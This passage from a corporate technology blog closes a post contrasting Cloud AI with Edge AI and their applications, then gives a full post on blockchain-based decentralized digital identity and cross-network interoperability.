  • In Edge AI, data and algorithms are stored and run on hardware at the periphery of the network: from wearables to vehicles, IoT devices and Edge servers such as AWS Snowball.

This difference means that each approach has its advantages and disadvantages, as we will see in more detail in a future post, but they can be briefly summarised as follows:

Cloud AI

  • Advantages: it usually has a greater capacity and computing power, which allows it to process and analyse large amounts of data. As a cloud platform, the power and capacity can be scaled up or down as needed.
  • Disadvantages: The need to transfer data can cause speed, security and regulatory, data residency or privacy issues. Physical distance of hundreds or thousands of kilometres or network congestion can slow communications and increase data exposure.

Edge AI

  • Advantages: requires less bandwidth and has almost imperceptible latency. It offers immediate response and increased data security, but also has an impact on users’ privacy. It can operate in remote areas or isolated environments without connectivity.
  • Disadvantages: As mentioned above, limited computing power and memory can reduce the types and complexity of AI models they can run. The need to optimise algorithms and use specific hardware can increase development and deployment costs.

Edge AI applications

Edge AI can be applied in a variety of sectors. Some of the most obvious applications include security surveillance, voice assistants, Smart Industry or wearables. Some use cases would be:

  • Security cameras with machine vision capabilities that analyse image content in real time to identify suspicious objects or people, events or behaviour.
  • Voice assistants learn to recognise speech locally to detect when to activate or to respond to simple instructions.
  • In Smart Industry, where sensors or vision systems monitor the quality of production or logistics processes or products, such as the demo we showed together with AWS at MWC.
  • Wearables and medical devices, such as heart rate or glucose monitors, to analyse patient data in real time and alert on any anomaly.

Edge AI can also be applied to driver assistance systems (ADAS). Or in autonomous cars, to process data captured by vehicle sensors, such as cameras or accelerometers, to detect and respond to traffic conditions.

Conclusion

Edge AI is a suitable approach when data needs to be analysed and processed with an immediate response, without delays caused by latency or by insufficient connectivity or bandwidth, while maintaining data privacy and security with the right implementation.

Edge AI is still in its infancy. With the continuous improvement of processing and storage capabilities in IoT devices and new developments in AI-specific hardware, such as AIU processors, it is still in the early stages of its evolution.

The combination of Edge AI and next-generation connectivity, such as 5G and LPWA or NB-IoT via satellite, will accelerate innovation and has the potential to extend the reach of AI-enabled solutions to a wider range of industries and regions.

Featured photo: Luke Chesser / Unsplash. Apple Watch is an example of an Edge AI (consumer) device capable of processing data and executing AI models locally.

Blockchain reinvents Digital Identity

María Teresa Nieto Galán    12 April, 2023

The concept of Digital Identity has become increasingly important in our lives as the boundaries between real life and digital life blur. As a result, and to the same extent that we digitize our multiple "selves", we become aware of the inconveniences associated with the process.

We all complain about repeating our data every time we register for a service. Or the difficulty of managing multiple identities simultaneously and in isolation. We are also aware of the need to take control of the personal data we provide about ourselves, the risk of data breaches this poses, or giving away more data than necessary.

Digital Identity and Blockchain

We have repeatedly heard that Blockchain is the ideal technology to reinvent digital identity as we know it. It can also solve or minimize the difficulties mentioned. By means of a decentralized and immutable registration mechanism, such as Blockchain, it would be much simpler to authenticate and verify what we know as digital identity while also preserving the user’s privacy.

Using Blockchain it would be much simpler to authenticate and verify digital identity, while also preserving the user’s privacy.

In addition, this technology could solve the familiar problem of repeating the same data in every registration process without knowing where, or to whom, we are giving it: since everything on the network is shared, it would be possible to reuse the same data from one identity and to provide traceability and transparency every time a user shares part or all of their data with an entity. However, this always starts from the requirement that the companies that want to use our data are on the same Blockchain network.

Sovereign digital identity, or recentralization vs. decentralization

Based on these premises, many companies have bet on reinventing digital identity with Blockchain technology. There are currently several solutions available on the market, both proprietary and open-source solutions, such as uPort or Sovrin. All of them create a completely decentralized ecosystem where the concept of Sovereign Digital Identity is implemented.

However, each solution is specific to a platform. In other words, we are once again creating multiple, isolated digital identity applications that cannot interoperate despite being decentralized.

From a technological point of view, this fragmentation is also reflected when developing applications based on Blockchain technology. Every time we want to work with these networks, whether they are public like Bitcoin or Ethereum or private like those based on Hyperledger Fabric, we have to create a specific identity to operate on them.

It is increasingly necessary to create interoperability mechanisms that allow us to create a single digital identity. This identity, while being decentralized, can operate with different technologies and applications.

If we also add the need for a multi-platform system with some authentication mechanism that is easy to monetize, the decentralization trend turns around and becomes its opposite: recentralization.

For this reason, it is increasingly necessary to create interoperability mechanisms that allow us to create a single identity that is truly decentralized (that is, without a single issuing entity that creates, maintains, validates and guarantees it) and capable of operating with the different technologies and applications available on the market. In these cases native decentralization is limited, and we need to decentralize the decentralized and make it interoperable.

What is a (truly) Decentralized Identity?

Just as in the original Blockchain networks, trust is placed in the network as a whole, composed of its members, and not in any specific relationship between them. The same should be true for identity. For example, let’s consider a bond issuance on a Blockchain network that involves three banks.

Why do we have to create a user account on that specific network created for that purpose to operate? If we join the network, what meaning does the identity created for us by the administrators (the three banks collectively) have for operating on that network? Why couldn’t we operate with those bonds without having to participate in the network?

What would be desirable is for each network to be able to offer me its services without knowing me. Or, in other words, to present myself to that network anonymously but with credentials that allow me to identify and verify my identity on any occasion.

An example of providing a service to “verified” strangers

It is somewhat similar to what telecommunications networks do when one of our subscribers visits another country and connects to a different mobile network while roaming. The visitor (roamer) is unknown to the visited network, which does not know who the owner of that mobile line is.

But instead of giving them a new identity, it uses the identity verified by their home network and provides them with service, even though it does not know who they are or what their data is (name, surname, or account number to bill them).

In this way, it would be possible to offer our customers digital identities that are not dependent on a single platform, service, or issuer, but on several. And also provide them with a much simpler and easier-to-manage user experience. Likewise, it would be possible to ensure that identity is not tied to a single decentralized access point or a single specific set of organizations or entities.

Identity in Blockchain networks

For all these reasons, interoperability between Blockchain networks, understood as the ability to operate with the same identity on various networks, is a necessary mechanism for the creation of a true decentralized identity.

However, it is not enough for an identity issued on one network by one organization to be accepted by another entity on another network. True interoperability will exist when unknown networks trust each other when verifying a user’s credentials and allow them to operate without any prior agreement, integration, or interconnection between them.

True interoperability will exist when unknown networks trust each other when verifying a user’s credentials

Thanks to these relationships of trust, which we could call implicit, we would significantly streamline the processes of provision and onboarding in business processes.

For example, we could create a Blockchain network to manage the supply chain without provisioning or registering suppliers in it. These would begin to operate without registering, but by sending transactions signed with their identity previously validated or issued in other sectoral, geographical, or functional networks.

Requirements could also be imposed for operation based on their solvency through credentials issued in a network where such attributes are managed. Or if they have a legal entity with a tax address in a specific region, accepting digital certificates issued for legal entities by the administration.

At Telefónica Tech, we have experience developing this type of solution in the TrustID project, released as open source through a project in Hyperledger Labs.

Featured photo: Vadim Bogulov / Unsplash